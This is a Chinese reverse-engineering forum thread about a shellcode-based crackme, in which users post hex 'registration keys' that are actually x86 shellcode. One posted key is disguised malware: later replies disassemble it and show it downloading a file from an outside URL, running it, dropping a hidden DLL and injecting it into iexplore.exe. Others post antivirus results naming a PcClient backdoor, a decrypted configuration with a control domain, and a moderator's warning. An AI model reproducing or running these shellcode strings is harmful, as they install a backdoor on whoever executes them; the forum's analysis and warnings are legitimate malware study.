首页
社区
课程
招聘
[游戏]一个奇怪的带壳crackme
发表于: 2006-12-9 19:20 20967

[游戏]一个奇怪的带壳crackme

2006-12-9 19:20
20967
收藏
免费 7
支持
分享
最新回复 (78)
雪    币: 846
活跃值: (221)
能力值: (RANK:570 )
在线值:
发帖
回帖
粉丝
26
25楼怎么象SHELL CODE
2006-12-12 23:31
0
雪    币: 230
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
27
最初由 笨笨雄 发布
25楼怎么象SHELL CODE


To find the key, think like a hacker


你把那些key粘贴为二进制就明白了
2006-12-13 01:00
0
雪    币: 109
活跃值: (498)
能力值: ( LV12,RANK:220 )
在线值:
发帖
回帖
粉丝
28
感觉就是 Shell Code
2006-12-13 12:25
0
雪    币: 146
活跃值: (33)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
29
E930EFFFFFE92BEFFFFF9090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909079214000

111010010011000011101111111111111111111111101001001010111110111111111111111111111001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000001111001001000010100000000000000
还是不明白.
2006-12-13 18:14
0
雪    币: 109
活跃值: (498)
能力值: ( LV12,RANK:220 )
在线值:
发帖
回帖
粉丝
30
最初由 sbright 发布
E930EFFFFFE92BEFFFFF90909090909090909090909090909090909090909090909090.........................
还是不明白.


汗,贴到 OD 里面看看~
2006-12-13 21:09
0
雪    币: 146
活跃值: (33)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
31
找个洞,钻进去了........
终于学会了在od中如何粘贴..........选中一块区域,点右键....2进制...粘贴

.................................
但是,大侠们是如何一步步弄出来的...
能说说..........................
2006-12-13 22:33
0
雪    币: 339
活跃值: (1510)
能力值: ( LV13,RANK:970 )
在线值:
发帖
回帖
粉丝
32
最初由 skylly 发布
不是Telock,有简单的Tls反调试和进程逃逸
楼主,你先设置OD停在系统断点,然后在409040处下断,运行
00409040 803D 08954000 C>cmp byte ptr [<ModuleEntryPoint>], 0CC
00409047 75 0A jnz short 00409053
00409049 C705 09954000 0>mov dword ptr [409509], 5000
........


学习了!

不过TLS Data = 00409024,应该是停留在:

00409024         90              nop
00409025         90              nop
00409026         90              nop
00409027         90              nop

下面是检查真正入口点是否被调试器设置了CC。不过还是不知道TLS的CallBack address = 00409060 这个地方的作用。以前见过TLS文档,不过没看过,兄弟如果有文档的话能否给提供一份?
2006-12-14 09:47
0
雪    币: 304
活跃值: (82)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
33
最初由 nbw 发布
学习了!

不过TLS Data = 00409024,应该是停留在:

00409024 90 nop
........


我也没有文档,看过的东西从来不保存的,能记住多少算多少.

这个EXE的TLS表中,AddressOfCallBacks处是409060,意味着TLS入口的地址保存在409060处,而409060处存的是409040,所以TLS入口为409040

我对TLS还是略知皮毛,最早见识TLS还是ooo做的那个利用TLS来做小动作的程序。
参考
http://www.pediy.com/bbshtml/bbs7/pediy7-660.htm
2006-12-14 21:46
0
雪    币: 339
活跃值: (1510)
能力值: ( LV13,RANK:970 )
在线值:
发帖
回帖
粉丝
34
噢,原?狨紫呀。还是没记住,下次碰到了再来问你
2006-12-14 22:47
0
雪    币: 405
活跃值: (10)
能力值: ( LV9,RANK:1130 )
在线值:
发帖
回帖
粉丝
35
站个位置先。这个cm我没有头绪。
2006-12-16 09:23
0
雪    币: 817
活跃值: (1927)
能力值: ( LV12,RANK:2670 )
在线值:
发帖
回帖
粉丝
36
除heXer外,shoooo,linex,cater人引用的SHELL CODE代码:
EB02EB4DE8F9FFFFFF608B6C24248B453C8B7C057801EF8B4F188B5F2001EB498B348B
01EE31C099AC84C07407C1CA0D01C2EBF43B54242875E58B5F2401EB668B0C4B8B5F1C
01EB032C8B896C241C61C331DB648B43308B400C8B701CAD8B40085E688E4E0EEC5068
AAFC0D7C50FFD68BF85A5AFFD666536A3266686C33687368656C54FFD0536A41686375
7465686C457865685368656C5450FFD753686F70656E53686B2E636E686E7061636862
732E75683A2F2F6268687474706A0353538D54240C528D5424285253FFD083C448B811
AB1040C1E80866C74001602266B8732280700190E943EEFFFF90??????????????????
??????????????????????9090909074214000


其中以下代码可以修改标题:
??????????????????
??????????????????????


代码解密:


演示代码:
EB02EB4DE8F9FFFFFF608B6C24248B453C8B7C057801EF8B4F188B5F2001EB498B348B
01EE31C099AC84C07407C1CA0D01C2EBF43B54242875E58B5F2401EB668B0C4B8B5F1C
01EB032C8B896C241C61C331DB648B43308B400C8B701CAD8B40085E688E4E0EEC5068
AAFC0D7C50FFD68BF85A5AFFD666536A3266686C33687368656C54FFD0536A41686375
7465686C457865685368656C5450FFD753686F70656E53686B2E636E686E7061636862
732E75683A2F2F6268687474706A0353538D54240C528D5424285253FFD083C448B811
AB1040C1E80866C74001602266B8732280700190E943EEFFFF90313131313131313131
31313131313131313131319090909074214000
2006-12-17 20:37
0
雪    币: 255
活跃值: (207)
能力值: ( LV9,RANK:250 )
在线值:
发帖
回帖
粉丝
37

555181EC00100000EB1B81C428100000595D33C0C35B4B33C966B9150180340BEEE2FAEB05E8EBFFFFFF0748EEEEEEB18A4FDEEEEEEE65AEE2659EF2436586E6651984EAB706A8EEEEEE0C17868180EEEE869B9C8283BA11F8650606DEEEEEEE6D02CE653284CEBD11B8EA29EAEDB2899DC029AAEDEA8B968BEEDD2EBEBEBDB9BE11B8FE6532BEBD11B8E60794111111BFB8659BD2659AC096ED1BB86598CEED1BDD27A7AF43ED2BDD35E150FED4389AE62F25E3ED34AE051FD5F19B09B065B0CAED338865E2A565B0F2ED3365EA65ED2B45B0B72D06BB11111160A0E0022F970B56761064E090360C9DD8F4C19E869A9A9ED4C1C1999999C086D6D8C08D8183C08D80C19A8B9D9AC19D868081858B97C0849E89EE

这个也能注册?
2006-12-20 20:58
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
38
我要努力学习,到时候我也能像大家一样加入讨论
2006-12-21 19:19
0
雪    币: 254
活跃值: (126)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
39
不要试别人的KEY,有危险,完全给你可以搞个灰鸽子进去
2006-12-21 21:45
0
雪    币: 146
活跃值: (33)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
40
最初由 heXer 发布
不要试别人的KEY,有危险,完全给你可以搞个灰鸽子进去

会搞也不搞灰鸽......搞个rootkit....
2006-12-21 21:54
0
雪    币: 254
活跃值: (126)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
41
最初由 peaceclub 发布

555181EC00100000EB1B81C428100000595D33C0C35B4B33C966B9150180340BEEE2FAEB05E8EBFFFFFF0748EEEEEEB18A4FDEEEEEEE65AEE2659EF2436586E6651984EAB706A8EEEEEE0C17868180EEEE869B9C8283BA11F8650606DEEEEEEE6D02CE653284CEBD11B8EA29EAEDB2899DC029AAEDEA8B968BEEDD2EBEBEBDB9BE11B8FE6532BEBD11B8E60794111111BFB8659BD2659AC096ED1BB86598CEED1BDD27A7AF43ED2BDD35E150FED4389AE62F25E3ED34AE051FD5F19B09B065B0CAED338865E2A565B0F2ED3365EA65ED2B45B0B72D06BB11111160A0E0022F970B56761064E090360C9DD8F4C19E869A9A9ED4C1C1999999C086D6D8C08D8183C08D80C19A8B9D9AC19D868081858B97C0849E89EE

这个也能注册?


把http://www.h86.com.cn/test/shnokey.jpg下载到system32\gs.exe然后执行
gs.exe执行以后会下载一个叫yieoxsyf.d1?的文件到system32下,并且是隐藏的,用IceSword可以看到
还会启动你的iexplore.exe并把那个yieoxsyf注入进去,iexplore.exe并不会跑出界面来,是个隐藏进程

这个东西具体会做什么我不清楚,我只是简单的在虚拟机下直接跑了一下,发现有这些变化的,然后恢复了snapshot
我把两个文件打包在复件里,文件名也改成非exe了,有兴趣的可以研究
rar压缩密码:12344321
上传的附件:
2006-12-21 22:33
0
雪    币: 47147
活跃值: (20450)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
42
最初由 peaceclub 发布

555181EC00100000EB1B81C428100000595D33C0C35B4B33C966B9150180340BEEE2FAEB05E8EBFFFFFF0748EEEEEEB18A4FDEEEEEEE65AEE2659EF2436586E6651984EAB706A8EEEEEE0C17868180EEEE869B9C8283BA11F8650606DEEEEEEE6D02CE653284CEBD11B8EA29EAEDB2899DC029AAEDEA8B968BEEDD2EBEBEBDB9BE11B8FE6532BEBD11B8E60794111111BFB8659BD2659AC096ED1BB86598CEED1BDD27A7AF43ED2BDD35E150FED4389AE62F25E3ED34AE051FD5F19B09B065B0CAED338865E2A565B0F2ED3365EA65ED2B45B0B72D06BB11111160A0E0022F970B56761064E090360C9DD8F4C19E869A9A9ED4C1C1999999C086D6D8C08D8183C08D80C19A8B9D9AC19D868081858B97C0849E89EE

这个也能注册?


重要提醒!这是一个利用Shellcoder原理进行注册的CrackMe,放到这里只是当一个游戏,以掌握一些Shellcoder原理。peaceclub提供的这个key由于含有字符0,因此还不能溢出执行。但这段代码含有明显的恶意行为,如果将代码复制到OD里执行,程序将下载shnokey.jpg到系统目录并释放文件,然后注入iexplore.exe,并隐藏相关信息,分析详见41楼,而其本人没对这段代码带来的不良影响有任何说明!论坛一直反对各种放马行为,如果是木马、恶意代码或病毒一定需要用显眼的文字注明!希望peaceclub给个解释!
2006-12-22 09:32
0
雪    币: 258
活跃值: (230)
能力值: ( LV12,RANK:770 )
在线值:
发帖
回帖
粉丝
43
RPWT?

copy了一份
shellcode:
004022CA                                      EB 02 EB 4D              ?胪
004022DA  E8 F9 FF FF FF 60 8B 6C 24 24 8B 45 3C 8B 7C 05  棂???$$?<?
004022EA  78 01 EF 8B 4F 18 8B 5F 20 01 EB 49 8B 34 8B 01  x?O? 肷??
004022FA  EE 31 C0 99 AC 84 C0 74 07 C1 CA 0D 01 C2 EB F4  ???吏潦.码
0040230A  3B 54 24 28 75 E5 8B 5F 24 01 EB 66 8B 0C 4B 8B  ;T$(u?_$腈?K
0040231A  5F 1C 01 EB 03 2C 8B 89 6C 24 1C 61 C3 31 DB 64  _?,?l$a?垆
0040232A  8B 43 30 8B 40 0C 8B 70 1C AD 8B 40 08 5E 68 8E  ?0?.??@^h
0040233A  4E 0E EC 50 68 AA FC 0D 7C 50 FF D6 8B F8 5A 5A  N煨h?.|P??ZZ
0040234A  FF D6 66 53 6A 32 66 68 6C 33 68 73 68 65 6C 54  ?fSj2fhl3hshelT
0040235A  FF D0 53 6A 41 68 63 75 74 65 68 6C 45 78 65 68  ?SjAhcutehlExeh
0040236A  53 68 65 6C 54 50 FF D7 53 68 6F 70 65 6E 53 68  ShelTP?ShopenSh
0040237A  2E 63 6F 6D 68 65 64 69 79 68 62 73 2E 70 68 3A  .comhediyhbs.ph:
0040238A  2F 2F 62 68 68 74 74 70 6A 03 53 53 8D 54 24 0C  //bhhttpjSS?$.
0040239A  52 8D 54 24 28 52 53 FF D0 83 C4 48 B8 11 AB 10  R?$(RS??H??
004023AA  40 C1 E8 08 66 C7 40 01 60 22 66 B8 73 22 80 70  @凌f抢`"f阁"?
004023BA  01 90 E9 43 EE FF FF 90 53 61 79 3A D2 BB D6 B1  ?C??Say:一直
004023CA  C3 BB D3 D0 B8 DF CA D6 C4 F1 CE D2 D3 D0 B8 DF  没有高手鸟我有高
004023DA  CA D6 C4 F1 CE D2 90 90 90 90 90 90 90 90 90 90  手鸟我?????
004023EA  90 90                                            ?.

004022D6   /EB 02           jmp     short 004022DA
004022D8   |EB 4D           jmp     short 00402327
004022DA   \E8 F9FFFFFF     call    004022D8
004022DF    60              pushad
004022E0    8B6C24 24       mov     ebp, dword ptr [esp+24]
004022E4    8B45 3C         mov     eax, dword ptr [ebp+3C]
004022E7    8B7C05 78       mov     edi, dword ptr [ebp+eax+78]
004022EB    01EF            add     edi, ebp
004022ED    8B4F 18         mov     ecx, dword ptr [edi+18]
004022F0    8B5F 20         mov     ebx, dword ptr [edi+20]
004022F3    01EB            add     ebx, ebp
004022F5    49              dec     ecx
004022F6    8B348B          mov     esi, dword ptr [ebx+ecx*4]
004022F9    01EE            add     esi, ebp
004022FB    31C0            xor     eax, eax
004022FD    99              cdq
004022FE    AC              lods    byte ptr [esi]
004022FF    84C0            test    al, al
00402301    74 07           je      short 0040230A
00402303    C1CA 0D         ror     edx, 0D
00402306    01C2            add     edx, eax
00402308  ^ EB F4           jmp     short 004022FE
0040230A    3B5424 28       cmp     edx, dword ptr [esp+28]
0040230E  ^ 75 E5           jnz     short 004022F5
00402310    8B5F 24         mov     ebx, dword ptr [edi+24]
00402313    01EB            add     ebx, ebp
00402315    66:8B0C4B       mov     cx, word ptr [ebx+ecx*2]
00402319    8B5F 1C         mov     ebx, dword ptr [edi+1C]
0040231C    01EB            add     ebx, ebp
0040231E    032C8B          add     ebp, dword ptr [ebx+ecx*4]
00402321    896C24 1C       mov     dword ptr [esp+1C], ebp
00402325    61              popad
00402326    C3              retn
00402327    31DB            xor     ebx, ebx
00402329    64:8B43 30      mov     eax, dword ptr fs:[ebx+30]
0040232D    8B40 0C         mov     eax, dword ptr [eax+C]
00402330    8B70 1C         mov     esi, dword ptr [eax+1C]
00402333    AD              lods    dword ptr [esi]
00402334    8B40 08         mov     eax, dword ptr [eax+8]
00402337    5E              pop     esi
00402338    68 8E4E0EEC     push    EC0E4E8E
0040233D    50              push    eax
0040233E    68 AAFC0D7C     push    7C0DFCAA
00402343    50              push    eax
00402344    FFD6            call    esi
00402346    8BF8            mov     edi, eax
00402348    5A              pop     edx
00402349    5A              pop     edx
0040234A    FFD6            call    esi
0040234C    66:53           push    bx
0040234E    6A 32           push    32
00402350    66:68 6C33      push    336C
00402354    68 7368656C     push    6C656873
00402359    54              push    esp
0040235A    FFD0            call    eax
0040235C    53              push    ebx
0040235D    6A 41           push    41
0040235F    68 63757465     push    65747563
00402364    68 6C457865     push    6578456C
00402369    68 5368656C     push    6C656853
0040236E    54              push    esp
0040236F    50              push    eax
00402370    FFD7            call    edi
00402372    53              push    ebx
00402373    68 6F70656E     push    6E65706F
00402378    53              push    ebx
00402379    68 2E636F6D     push    6D6F632E
0040237E    68 65646979     push    79696465
00402383    68 62732E70     push    702E7362
00402388    68 3A2F2F62     push    622F2F3A
0040238D    68 68747470     push    70747468
00402392    6A 03           push    3
00402394    53              push    ebx
00402395    53              push    ebx
00402396    8D5424 0C       lea     edx, dword ptr [esp+C]
0040239A    52              push    edx
0040239B    8D5424 28       lea     edx, dword ptr [esp+28]
0040239F    52              push    edx
004023A0    53              push    ebx
004023A1    FFD0            call    eax
004023A3    83C4 48         add     esp, 48
004023A6    B8 11AB1040     mov     eax, 4010AB11
004023AB    C1E8 08         shr     eax, 8
004023AE    66:C740 01 6022 mov     word ptr [eax+1], 2260
004023B4    66:B8 7322      mov     ax, 2273
004023B8    8070 01 90      xor     byte ptr [eax+1], 90
004023BC  - E9 43EEFFFF     jmp     00401204
004023C1    90              nop
004023C2    53              push    ebx
004023C3    61              popad
004023C4    79 3A           jns     short 00402400
004023C6    D2BB D6B1C3BB   sar     byte ptr [ebx+BBC3B1D6], cl
004023CC    D3D0            rcl     eax, cl
004023CE    B8 DFCAD6C4     mov     eax, C4D6CADF
004023D3    F1              int1
004023D4    CE              into
004023D5    D2D3            rcl     bl, cl
004023D7    D0B8 DFCAD6C4   sar     byte ptr [eax+C4D6CADF], 1
004023DD    F1              int1
004023DE    CE              into
004023DF    D290 90909090   rcl     byte ptr [eax+90909090], cl
004023E5    90              nop
004023E6    90              nop
004023E7    90              nop
004023E8    90              nop
004023E9    90              nop
004023EA    90              nop
004023EB    90              nop
2006-12-22 10:06
0
雪    币: 367
活跃值: (42)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
44
.text:100036AE ; END OF FUNCTION CHUNK FOR DllEntryPoint
.text:100036AE ; ---------------------------------------------------------------------------
.text:100036B3 s->Goldsun      db 'Goldsun',0
.text:100036BB                 align 4
.text:100036BC                 dd 0
.text:100036C0                 db 0
.text:100036C1
.text:100036C1 ; =============== S U B R O U T I N E =======================================
.text:100036C1
.text:100036C1
.text:100036C1 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpReserved)
.text:100036C1                 public DllEntryPoint
.text:100036C1 DllEntryPoint   proc near

这下.............
2006-12-22 10:46
0
雪    币: 304
活跃值: (82)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
45
原以为peaceclub是个好人,想也没想就运行了他的key,
2006-12-22 11:05
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
46
1:
AntiVir 7.3.0.21 12.21.2006 DR/PcClient.Gen
Authentium 4.93.8 12.22.2006  no virus found
Avast 4.7.892.0 12.21.2006 Win32:Pcclient-CY
AVG 386 12.21.2006  no virus found
BitDefender 7.2 12.22.2006 Dropped:Backdoor.Pcclient.SYS
CAT-QuickHeal 8.00 12.21.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 12.21.2006  no virus found
DrWeb 4.33 12.21.2006 Trojan.DownLoader.3856
eSafe 7.0.14.0 12.21.2006  no virus found
eTrust-InoculateIT 23.73.95 12.22.2006  no virus found
eTrust-Vet 30.3.3268 12.21.2006  no virus found
Ewido 4.0 12.21.2006  no virus found
Fortinet 2.82.0.0 12.21.2006  no virus found
F-Prot 3.16f 12.21.2006  no virus found
F-Prot4 4.2.1.29 12.21.2006  no virus found
Ikarus T3.1.0.27 12.21.2006  no virus found
Kaspersky 4.0.2.24 12.22.2006  no virus found
McAfee 4924 12.21.2006 BackDoor-CKB
Microsoft 1.1904 12.21.2006  no virus found
NOD32v2 1934 12.21.2006 a variant of Win32/PcClient
Norman 5.80.02 12.21.2006  no virus found
Panda 9.0.0.4 12.21.2006 Suspicious file
Prevx1 V2 12.22.2006  no virus found
Sophos 4.12.0 12.21.2006  no virus found
Sunbelt 2.2.907.0 12.18.2006 VIPRE.Suspicious
TheHacker 6.0.3.135 12.20.2006  no virus found
UNA 1.83 12.21.2006  no virus found
VBA32 3.11.1 12.21.2006 suspected of Backdoor.Hupigon.17
VirusBuster 4.3.19:9 12.21.2006 no virus found
2:
AntiVir 7.3.0.21 12.21.2006 TR/Dldr.Small.bgk
Authentium 4.93.8 12.22.2006  no virus found
Avast 4.7.892.0 12.21.2006 Win32:PcClient-EO
AVG 386 12.21.2006  no virus found
BitDefender 7.2 12.22.2006 Trojan.Downloader.Gen
CAT-QuickHeal 8.00 12.21.2006  no virus found
ClamAV devel-20060426 12.21.2006  no virus found
DrWeb 4.33 12.21.2006 Trojan.DownLoader.3856
eSafe 7.0.14.0 12.21.2006  no virus found
eTrust-InoculateIT 23.73.95 12.22.2006  no virus found
eTrust-Vet 30.3.3268 12.21.2006 Win32/Pcclient!generic
Ewido 4.0 12.21.2006 Backdoor.PcClient.cj
Fortinet 2.82.0.0 12.21.2006  no virus found
F-Prot 3.16f 12.21.2006  no virus found
F-Prot4 4.2.1.29 12.21.2006  no virus found
Ikarus T3.1.0.27 12.21.2006 Trojan-Downloader.Win32.Small.BID
Kaspersky 4.0.2.24 12.22.2006  no virus found
McAfee 4924 12.21.2006  no virus found
Microsoft 1.1904 12.21.2006  no virus found
NOD32v2 1934 12.21.2006 a variant of Win32/PcClient.IF
Norman 5.80.02 12.21.2006  no virus found
Panda 9.0.0.4 12.21.2006 Suspicious file
Prevx1 V2 12.22.2006  no virus found
Sophos 4.12.0 12.21.2006  no virus found
Sunbelt 2.2.907.0 12.18.2006  no virus found
TheHacker 6.0.3.135 12.20.2006  no virus found
UNA 1.83 12.21.2006  no virus found
VBA32 3.11.1 12.21.2006 suspected of Backdoor.PcClient.1
VirusBuster 4.3.19:9 12.21.2006 no virus found

木马兼下载器,好象还有驱动,RP有待提高!
2006-12-22 11:25
0
雪    币: 254
活跃值: (126)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
47
密钥:10 20 17 10 09 55 11 EB
解密yieoxsyf.d1l末尾0x8B8字节,应该是配置吧

000AEFD0  90 1F 00 00 00 26 00 00 AC 2D 00 00 83 1F 00 00  ?...&..?..?..
000AEFE0  00 00 00 00 0A 00 00 00 31 00 00 00 01 00 00 00  ........1......
000AEFF0  33 88 00 00 77 65 62 75 70 64 61 74 65 2E 33 33  3?.webupdate.33
000AF000  32 32 2E 6F 72 67 00 00 00 00 00 00 00 00 00 00  22.org..........
000AF010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF070  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF080  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF090  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0A0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0F0  00 00 00 00 53 48 45 44 55 00 00 00 00 00 00 00  ....SHEDU.......
000AF100  00 00 00 00 00 00 00 00 00 00 00 00 59 69 65 6F  ............Yieo
000AF110  78 73 79 66 00 00 00 00 00 00 00 00 43 3A 5C 50  xsyf........C:\P
000AF120  72 6F 67 72 61 6D 20 46 69 6C 65 73 5C 49 6E 74  rogram Files\Int
000AF130  65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 69  ernet Explorer\i
000AF140  65 78 70 6C 6F 72 65 2E 65 78 65 00 00 00 00 00  explore.exe.....
000AF150  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF160  67 6F 6C 64 73 75 6E 00 00 00 00 00 00 00 00 00  goldsun.........
000AF170  00 00 00 00 00 00 00 00 FB 4F 50 4F 7B 5B FE 47  ........?PO{[?
000AF180  82 F4 A2 7C 89 5E 37 3D 43 3A 5C 44 6F 63 75 6D  ?Ⅻ?7=C:\Docum
000AF190  65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67  ents and Setting
000AF1A0  73 5C 67 61 74 65 73 5C D7 C0 C3 E6 5C 73 68 6E  s\gates\桌面\shn
000AF1B0  6F 6B 65 79 2E 65 78 65 00 00 00 00 00 00 00 00  okey.exe........
000AF1C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF1D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF1E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF1F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF200  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF210  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF220  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF230  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF240  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF250  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF260  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF270  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF280  00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4E 54  ........C:\WINNT
000AF290  5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72  \system32\driver
000AF2A0  73 5C 59 69 65 6F 78 73 79 66 2E 73 79 73 00 00  s\Yieoxsyf.sys..
000AF2B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF2C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF2D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF2E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF2F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF300  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF310  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF320  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF330  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF340  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF350  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF360  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF370  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF380  00 00 00 00 00 00 00 00 43 3A 5C 44 4F 43 55 4D  ........C:\DOCUM
000AF390  45 7E 31 5C 67 61 74 65 73 5C 4C 4F 43 41 4C 53  E~1\gates\LOCALS
000AF3A0  7E 31 5C 54 65 6D 70 5C 59 69 65 6F 78 73 79 66  ~1\Temp\Yieoxsyf
000AF3B0  2E 74 6D 70 00 00 00 00 00 00 00 00 00 00 00 00  .tmp............
000AF3C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF3D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF3E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF3F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF400  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF410  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF420  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF430  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF440  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF450  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF460  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF470  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF480  00 00 00 00 00 00 00 00 43 3A 5C 44 4F 43 55 4D  ........C:\DOCUM
000AF490  45 7E 31 5C 67 61 74 65 73 5C 4C 4F 43 41 4C 53  E~1\gates\LOCALS
000AF4A0  7E 31 5C 54 65 6D 70 5C 59 69 65 6F 78 73 79 66  ~1\Temp\Yieoxsyf
000AF4B0  2E 64 6C 31 00 00 00 00 00 00 00 00 00 00 00 00  .dl1............
000AF4C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF4D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF4E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF4F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF500  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF510  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF520  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF530  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF540  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF550  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF560  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF570  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF580  00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4E 54  ........C:\WINNT
000AF590  5C 73 79 73 74 65 6D 33 32 5C 59 69 65 6F 78 73  \system32\Yieoxs
